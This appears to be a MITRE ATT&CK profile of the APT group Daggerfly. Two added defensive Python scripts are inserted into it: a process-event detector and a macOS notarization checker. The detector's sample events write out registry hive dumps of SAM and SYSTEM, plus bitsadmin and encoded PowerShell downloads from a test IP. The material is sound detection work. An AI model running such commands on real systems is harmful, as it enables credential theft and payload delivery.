Daggerfly

Daggerfly is a People's Republic of China-linked APT group active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is the only group associated with the MgBot malware and is noted for several suspected supply chain infection campaigns.[1][2][3][4]

ID: G1034
Associated Groups: Evasive Panda, BRONZE HIGHLAND
Contributors: Furkan Celik, PURE7
Version: 1.0
Created: 25 July 2024
Last Modified: 31 October 2024

Associated Group Descriptions

Name Description
Evasive Panda

[1][4]

BRONZE HIGHLAND

[1][4]

Techniques Used

Domain ID Name Use
Enterprise T1036 .003 Masquerading: Rename System Utilities

Daggerfly used a renamed copy of rundll32.exe (for example "dbengin.exe" in the ProgramData\Microsoft\PlayReady directory) to proxy execution of malicious DLLs.[1]

Enterprise T1195 .002 Supply Chain Compromise: Compromise Software Supply Chain

Daggerfly is associated with several supply chain compromises using malicious updates to compromise victims.[2][4]

Enterprise T1136 .001 Create Account: Local Account

Daggerfly created a local account on victim machines to maintain access.[1]

Enterprise T1574 .002 Hijack Execution Flow: DLL Side-Loading

Daggerfly has used legitimate software to side-load PlugX loaders onto victim systems.[1] Daggerfly is also linked to multiple other instances of side-loading for initial loading activity.[4]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Daggerfly used PowerShell to download and execute remote-hosted files on victim systems.[1]

Enterprise T1584 .004 Compromise Infrastructure: Server

Daggerfly compromised web servers hosting updates for software as part of a supply chain intrusion.[4]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Daggerfly uses HTTP for command and control communication.[4]

Enterprise T1587 .002 Develop Capabilities: Code Signing Certificates

Daggerfly created code signing certificates to sign malicious macOS files.[4]

Enterprise T1003 .002 OS Credential Dumping: Security Account Manager

Daggerfly used Reg to dump the Security Account Manager (SAM) hive from victim machines for follow-on credential extraction.[1]

Enterprise T1012 Query Registry

Daggerfly used Reg to dump the Security Account Manager (SAM), System, and Security Windows registry hives from victim machines.[1]

Enterprise T1189 Drive-by Compromise

Daggerfly has used strategic website compromise for initial access against victims.[4]

Enterprise T1204 .001 User Execution: Malicious Link

Daggerfly has used strategic website compromise to deliver a malicious link requiring user interaction.[4]

Enterprise T1218 .011 System Binary Proxy Execution: Rundll32

Daggerfly proxied execution of malicious DLLs through a renamed rundll32.exe binary.[1]

Enterprise T1082 System Information Discovery

Daggerfly uses victim operating system information to build custom User-Agent strings for subsequent command and control communication.[4]

Enterprise T1105 Ingress Tool Transfer

Daggerfly has used PowerShell and BITSAdmin to retrieve follow-on payloads from external locations for execution on victim machines.[1]
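As an added example (not code from this page or from any vendor it cites), the following Python detector runs over constructed Sysmon-style process-creation events and flags three of the behaviours described above: a renamed rundll32.exe as in the Rename System Utilities and Rundll32 entries, reg.exe saving the SAM, SYSTEM or SECURITY hive as in the OS Credential Dumping and Query Registry entries, and BITSAdmin or PowerShell downloads as in the Ingress Tool Transfer entry. The rename check relies on the fact that renaming a file on disk does not change the OriginalFileName stored in its PE version resource, which Sysmon Event ID 1 records. The file paths beyond the page's own PlayReady directory, the DLL name, the 203.0.113.x URLs and the OriginalFileName values are constructed sample data.

```python
"""Flag Daggerfly-style process-creation events: renamed rundll32.exe, reg.exe hive saves,
and bitsadmin/PowerShell downloads. Sample events below are constructed for this example."""
import base64
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 (process create) record."""
    image: str                # full path of the new process
    original_file_name: str   # OriginalFileName from the PE version resource
    command_line: str


# Living-off-the-land binaries whose on-disk name should match their PE OriginalFileName.
RENAME_WATCHLIST = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"}

HIVE_SAVE_RE = re.compile(r'\b(?:save|export)\s+"?(?:hklm|hkey_local_machine)\\(sam|system|security)\b',
                          re.IGNORECASE)
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
PS_DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer",
                            re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    return ntpath.basename(path.strip('"')).lower()


def expand_encoded(command_line: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so download cmdlets are visible."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return command_line
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return command_line
    return command_line + " " + decoded


def detect(ev: ProcessEvent) -> list[str]:
    hits = []
    name = basename(ev.image)
    original = ev.original_file_name.lower()
    cmd = expand_encoded(ev.command_line)

    # T1036.003 / T1218.011: PE version resource says rundll32.exe but the file on disk is called otherwise.
    if original in RENAME_WATCHLIST and name != original:
        hits.append(f"renamed_{original[:-4]}")  # e.g. renamed_rundll32

    # T1003.002 / T1012: reg.exe saving the SAM, SYSTEM or SECURITY hive to a file.
    if name == "reg.exe":
        for hive in HIVE_SAVE_RE.findall(cmd):
            hits.append(f"hive_dump_{hive.lower()}")

    # T1105: bitsadmin /transfer or a PowerShell download cmdlet with a URL on the command line.
    if name == "bitsadmin.exe" and "/transfer" in cmd.lower() and URL_RE.search(cmd):
        hits.append("ingress_bitsadmin")
    if name in {"powershell.exe", "pwsh.exe"} and PS_DOWNLOAD_RE.search(cmd) and URL_RE.search(cmd):
        hits.append("ingress_powershell")
    return hits


# Constructed sample events (assumed OriginalFileName values, RFC 5737 test addresses).
_PS_PAYLOAD = "(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/upd.dat','C:\\ProgramData\\upd.dat')"
_PS_ENCODED = base64.b64encode(_PS_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    ProcessEvent(r"C:\ProgramData\Microsoft\PlayReady\dbengin.exe", "RUNDLL32.EXE",
                 r'"C:\ProgramData\Microsoft\PlayReady\dbengin.exe" C:\ProgramData\Microsoft\PlayReady\payload.dll,Start'),
    ProcessEvent(r"C:\Windows\System32\reg.exe", "reg.exe", r"reg save hklm\sam C:\ProgramData\sam.hiv"),
    ProcessEvent(r"C:\Windows\System32\reg.exe", "reg.exe", r'reg save "HKLM\SYSTEM" C:\ProgramData\sys.hiv'),
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe",
                 r"bitsadmin /transfer job /download /priority high http://203.0.113.10/x.dat C:\ProgramData\x.dat"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
                 f"powershell.exe -nop -w hidden -enc {_PS_ENCODED}"),
    # Benign controls: the real rundll32 under its own name, and a reg query rather than a save.
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", "RUNDLL32.EXE", "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcessEvent(r"C:\Windows\System32\reg.exe", "reg.exe",
                 r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'),
]


def scan(events):
    """Return (image basename, hits) for every event that triggered at least one rule."""
    return [(basename(ev.image), detect(ev)) for ev in events if detect(ev)]


if __name__ == "__main__":
    for name, hits in scan(SAMPLE_EVENTS):
        print(f"{name}: {', '.join(hits)}")
```

The rename rule generalises beyond the page's rundll32 case to any binary on the watchlist; the benign controls show that the real rundll32.exe and an ordinary reg query do not fire. On real telemetry, extend it to Windows Security Event 4688 only if command-line auditing is enabled, since that event does not carry OriginalFileName.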

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

Daggerfly has attempted to use scheduled tasks for persistence in victim environments.[4]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Daggerfly has used signed, but not notarized, malicious files for execution in macOS environments.[4]
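The distinction the entry above turns on, a valid Developer ID signature with no notarization ticket, is something a responder can check directly. The following is an added example, not code from this page or from any vendor it cites: a Python triage helper that parses the output of Apple's `codesign -dv --verbose=4` and `spctl --assess --type exec -vv` and classifies a file as unsigned, signed but not notarized, or notarized. The sample outputs, team identifier and bundle names are constructed, and the exact `source=` strings (`Notarized Developer ID`, `Unnotarized Developer ID`) are an assumption about what current macOS prints; verify them against your own output before relying on the classification.

```python
"""Triage a macOS binary's signing state from codesign/spctl output.
Sample outputs below are constructed; the source= strings are assumed to match current macOS."""
import re
import subprocess


def parse_codesign(text: str) -> dict:
    """codesign -dv --verbose=4 writes key=value lines to stderr, or '... is not signed at all'."""
    info = {"signed": False, "authority": [], "team_id": None}
    if "not signed" in text:
        return info
    info["signed"] = True
    for line in text.splitlines():
        if line.startswith("Authority="):
            info["authority"].append(line.split("=", 1)[1])
        elif line.startswith("TeamIdentifier="):
            info["team_id"] = line.split("=", 1)[1]
    return info


def parse_spctl(text: str) -> dict:
    """spctl --assess prints '<path>: accepted|rejected' followed by a source= line."""
    verdict = re.search(r":\s*(accepted|rejected)\b", text)
    source = re.search(r"^source=(.*)$", text, re.MULTILINE)
    return {"verdict": verdict.group(1) if verdict else None,
            "source": source.group(1).strip() if source else None}


def classify(codesign_text: str, spctl_text: str) -> str:
    cs = parse_codesign(codesign_text)
    sp = parse_spctl(spctl_text)
    if not cs["signed"]:
        return "unsigned"
    # Gatekeeper accepted it and attributes that to a notarization ticket.
    # startswith() matters: "Unnotarized Developer ID" also contains the word "notarized".
    if sp["verdict"] == "accepted" and sp["source"] and sp["source"].lower().startswith("notarized"):
        return "notarized"
    # Valid Developer ID chain but no ticket: the case described on this page.
    if any(a.startswith("Developer ID Application") for a in cs["authority"]):
        return "signed-not-notarized"
    return "signed-other"  # ad-hoc, development or non-Apple-chained signature


def assess(path: str) -> str:
    """Run the real tools on a file (macOS only); both print their findings to stderr."""
    cs = subprocess.run(["codesign", "-dv", "--verbose=4", path], capture_output=True, text=True)
    sp = subprocess.run(["spctl", "--assess", "--type", "exec", "-vv", path], capture_output=True, text=True)
    return classify(cs.stderr, sp.stdout + sp.stderr)


# Constructed sample outputs (team ID and bundle names are placeholders).
SIGNED_CS = (
    "Executable=/Applications/Good.app/Contents/MacOS/Good\n"
    "Identifier=com.example.good\n"
    "Authority=Developer ID Application: Example Corp (ABCDE12345)\n"
    "Authority=Developer ID Certification Authority\n"
    "Authority=Apple Root CA\n"
    "TeamIdentifier=ABCDE12345\n"
)
NOTARIZED_SP = ("/Applications/Good.app: accepted\nsource=Notarized Developer ID\n"
                "origin=Developer ID Application: Example Corp (ABCDE12345)\n")
UNNOTARIZED_SP = ("/tmp/Dropper.app: rejected\nsource=Unnotarized Developer ID\n"
                  "origin=Developer ID Application: Example Corp (ABCDE12345)\n")
UNSIGNED_CS = "/tmp/x: code object is not signed at all\n"
UNSIGNED_SP = "/tmp/x: rejected\nsource=no usable signature\n"
```

Usage on a live host is `assess("/path/to/suspect.app")`; the `signed-not-notarized` result is the one to chase, since a valid Developer ID signature on a file that Gatekeeper rejects means a certificate was obtained but the binary was never submitted to Apple, and the `TeamIdentifier` gives you the identity to pivot on.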

Software

ID Name References Techniques
S0190 BITSAdmin Daggerfly has used BITSAdmin to retrieve files from remote locations to run on victim systems.[1] BITS Jobs, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Lateral Tool Transfer, Ingress Tool Transfer
S1016 MacMa Daggerfly is linked to the use and possibly the development of MacMa through overlapping command and control infrastructure and libraries shared with its other unique tools.[3] Credentials from Password Stores: Keychain, Data from Local System, Create or Modify System Process: Launch Agent, Encrypted Channel, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: Unix Shell, Screen Capture, Data Staged: Local Data Staging, File and Directory Discovery, Native API, Indicator Removal: Clear Linux or Mac System Logs, Indicator Removal: Timestomp, Indicator Removal: File Deletion, System Information Discovery, System Owner/User Discovery, System Network Configuration Discovery, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Remote Services, Exfiltration Over C2 Channel, Non-Application Layer Protocol, Non-Standard Port, Audio Capture, Subvert Trust Controls: Code Signing, Subvert Trust Controls: Gatekeeper Bypass
S1146 MgBot Daggerfly is the only group associated with the use of MgBot, since at least 2012.[2] Data from Information Repositories, Data from Removable Media, Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Data from Local System, Clipboard Data, Domain Trust Discovery, OS Credential Dumping, Steal Web Session Cookie, System Owner/User Discovery, Network Service Discovery, Account Discovery: Domain Account, Account Discovery: Local Account, Input Capture: Keylogging, Process Discovery, Remote System Discovery, Audio Capture
S1147 Nightdoor Daggerfly uses Nightdoor as a backdoor on Windows hosts.[4][3] Hijack Execution Flow, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol, Indicator Removal: File Deletion, System Information Discovery, System Owner/User Discovery, System Time Discovery, System Network Configuration Discovery, Web Service, Virtualization/Sandbox Evasion: System Checks, Process Discovery, Scheduled Task/Job: Scheduled Task
S0013 PlugX Daggerfly has used PlugX loaders as part of intrusions.[1] Masquerading: Masquerade Task or Service, Masquerading: Match Legitimate Name or Location, Modify Registry, Create or Modify System Process: Windows Service, Encrypted Channel: Symmetric Cryptography, Hijack Execution Flow: DLL Side-Loading, Hijack Execution Flow: DLL Search Order Hijacking, Deobfuscate/Decode Files or Information, Trusted Developer Utilities Proxy Execution: MSBuild, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Screen Capture, Application Layer Protocol: Web Protocols, Application Layer Protocol: DNS, File and Directory Discovery, Native API, Query Registry, Obfuscated Files or Information, System Network Connections Discovery, Network Share Discovery, Web Service: Dead Drop Resolver, Virtualization/Sandbox Evasion: System Checks, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Hide Artifacts: Hidden Files and Directories, Non-Application Layer Protocol
S0075 Reg Daggerfly has used Reg to dump various Windows registry hives from victim machines.[1] Modify Registry, Unsecured Credentials: Credentials in Registry, Query Registry

References